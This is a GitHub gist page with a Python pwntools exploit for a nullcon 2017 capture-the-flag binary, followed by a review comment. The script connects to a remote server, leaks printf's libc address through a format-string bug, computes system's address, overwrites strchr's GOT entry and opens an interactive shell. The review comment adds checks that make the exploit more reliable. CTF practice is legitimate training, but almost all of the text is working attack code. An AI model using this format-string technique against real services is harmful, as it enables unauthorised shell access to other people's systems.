Created
March 26, 2017 11:46
rverton created this gist
Mar 26, 2017 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,46 @@ #!/usr/bin/python # exploit for level1.bin (nullcon 2017) from pwn import * def add_book(p): p.sendline('1') p.recvuntil('Enter book name: ') p.sendline('a') p.recvuntil('Enter book id: ') p.sendline('1') def leak_addr(p, addr): p.sendline('3') p.recvuntil('Enter query: ') leak_fmt_str = p32(addr) + "%11$s" p.sendline(leak_fmt_str) result = p.recvline().strip() return u32(result[20:24]) if __name__ == '__main__': #p = process('./level1.bin', stdin=process.PTY) p = remote('34.198.96.6', 9001) p.recvuntil('Enter choice: ') add_book(p) p.recvuntil('Enter choice: ') printf = leak_addr(p, 0x804b014) printf_offset = 0x0004cdd0 system_offset = 0x0003fe70 system = printf - printf_offset + system_offset strchr_got = 0x804b030 log.info("printf @ %#x" % printf) log.info("system @ %#x" % system) payload = "/bin/sh # " payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12) p.sendline('3') p.recvuntil('Enter query: ') p.sendline(payload) p.interactive()
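Review bot: `leak_addr` returns `u32(result[20:24])` without checking that four bytes were actually received; `%s` stops at the first NUL and `recvline()` at the first 0x0a, so a libc pointer that happens to contain either byte leaves a short slice and `u32` raises on it, while a prefix length that is off by a few bytes silently produces a wrong value that is then used as the `system` address written into the GOT. I would replace the return with `leaked = result[20:24]`, `assert len(leaked) == 4, "short leak: %r" % result` and `return u32(leaked)`, so a failed leak stops the script before the format-string write. The derived address also goes unchecked: `printf_offset` and `system_offset` are hard-coded for one particular remote libc, and since `printf - printf_offset` is the libc base, a one-line `assert (printf - printf_offset) & 0xfff == 0, "unexpected libc layout"` after the leak would catch a mismatched libc cheaply. As a point of style, `p32(addr) + "%11$s"` mixes `bytes` with a `str` literal, which only works under Python 2; that seems consistent with the bare `#!/usr/bin/python` shebang, but it is worth a comment (`# Python 2 only: pwntools p32() returns bytes`) so the script is not run under Python 3 by accident.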